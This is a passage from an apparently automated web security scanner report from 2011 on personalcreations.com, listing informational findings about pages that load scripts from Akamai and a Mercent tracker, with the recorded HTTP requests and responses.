</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.25. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-christmas-gifts-PCHRBSL

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-christmas-gifts-PCHRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:10 GMT
Connection: close
Content-Length: 418054

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.26. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-communion-gifts-PCOMMUN

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-communion-gifts-PCOMMUN HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:21:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:19 GMT
Connection: close
Content-Length: 259238

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.27. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-congratulations-gifts-PCONGRA

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM?0&9/3/2011 6:19:52 PM?0&9/3/2011 6:19:56 PM?0&9/3/2011 6:20:33 PM?0&9/3/2011 6:20:09 PM?0&9/3/2011 6:21:18 PM?0&9/3/2011 6:21:00 PM?0&9/3/2011 6:20:59 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:59 GMT
Connection: close
Content-Length: 404968

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.28. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/personalized-graduation-gifts-PGRADUA

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
https://cdn.mercent.com/js/tracker.js

Request

GET /personalized-graduation-gifts-PGRADUA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
